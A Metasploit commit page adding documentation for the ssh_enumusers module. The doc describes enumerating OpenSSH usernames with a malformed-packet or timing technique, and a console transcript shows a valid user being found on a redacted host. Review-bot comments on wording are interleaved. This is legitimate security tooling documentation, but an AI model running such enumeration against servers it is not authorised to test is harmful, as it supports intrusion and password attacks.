Land #10498, module doc for ssh_enumusers

GSoC/Meterpreter_Web_Console
William Vu 2018-08-20 19:30:29 -05:00
commit 2fe6bd0e98
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
2 changed files with 80 additions and 1 deletions

@ -0,0 +1,79 @@
## Intro
This module uses a malformed packet or timing attack to enumerate users on
an OpenSSH server.
Testing note: invalid users were logged, while valid users were not. YMMV.
## Actions
**Malformed Packet**
The default action sends a malformed (corrupted) `SSH_MSG_USERAUTH_REQUEST`
packet using public key authentication (must be enabled) to enumerate users.
**Timing Attack**
On some versions of OpenSSH under some configurations, OpenSSH will return a
"permission denied" error for an invalid user faster than for a valid user,
creating an opportunity for a timing attack to enumerate users.
## Options
**USERNAME**
Single username to test (username spray).
**USER_FILE**
File containing usernames, one per line.
**THRESHOLD**
Amount of seconds needed before a user is considered found (timing attack only).
**CHECK_FALSE**
Check for false positives (random username).
## Usage
```
msf5 > use auxiliary/scanner/ssh/ssh_enumusers
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts [redacted]
rhosts => [redacted]
msf5 auxiliary(scanner/ssh/ssh_enumusers) > echo $'wvu\nbcook' > users
[*] exec: echo $'wvu\nbcook' > users
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set user_file users
user_file => users
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set verbose true
verbose => true
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
[*] [redacted]:22 - SSH - Using malformed packet technique
[*] [redacted]:22 - SSH - Starting scan
[+] [redacted]:22 - SSH - User 'wvu' found
[-] [redacted]:22 - SSH - User 'bcook' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) > set action Timing Attack
action => Timing Attack
msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
[*] [redacted]:22 - SSH - Using timing attack technique
[*] [redacted]:22 - SSH - Starting scan
[+] [redacted]:22 - SSH - User 'wvu' found
[-] [redacted]:22 - SSH - User 'bcook' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_enumusers) > creds
Credentials
===========
host origin service public private realm private_type
---- ------ ------- ------ ------- ----- ------------
[redacted] [redacted] 22/tcp (ssh) wvu
msf5 auxiliary(scanner/ssh/ssh_enumusers) >
```
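Review bot: The "Testing note: invalid users were logged, while valid users were not. YMMV." line in the Intro does not say which action it was observed with or which server version and log it refers to, so a reader cannot tell whether a scan with the default action leaves the same trail as the timing attack. State the action and the tested OpenSSH version next to the note, and do the same for "On some versions of OpenSSH under some configurations", which currently names neither. Under Options, THRESHOLD gives no default value or hint for choosing one, "Amount of seconds" should be "Number of seconds", and "(username spray)" on USERNAME is confusing for an option that takes a single name. The Usage transcript runs both actions but never sets THRESHOLD or CHECK_FALSE, so neither documented option is shown in effect; a short run with CHECK_FALSE enabled would show what a false-positive result looks like.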

@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary
This module uses a malformed packet or timing attack to enumerate users on This module uses a malformed packet or timing attack to enumerate users on
an OpenSSH server. an OpenSSH server.
The default action sends a malformed (truncated) SSH_MSG_USERAUTH_REQUEST The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST
packet using public key authentication (must be enabled) to enumerate users. packet using public key authentication (must be enabled) to enumerate users.
On some versions of OpenSSH under some configurations, OpenSSH will return a On some versions of OpenSSH under some configurations, OpenSSH will return a
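Review bot: "corrupted" in the reworded `SSH_MSG_USERAUTH_REQUEST` line is less specific than the "truncated" it replaces, and nothing in the visible context says what about the packet is corrupted. The change does bring the description in line with the new module doc, which also says "malformed (corrupted)", but both places would be clearer if they named the part of the request that is malformed. If the wording changed because the module no longer truncates the packet, say so in the commit message, since the title only mentions the module doc.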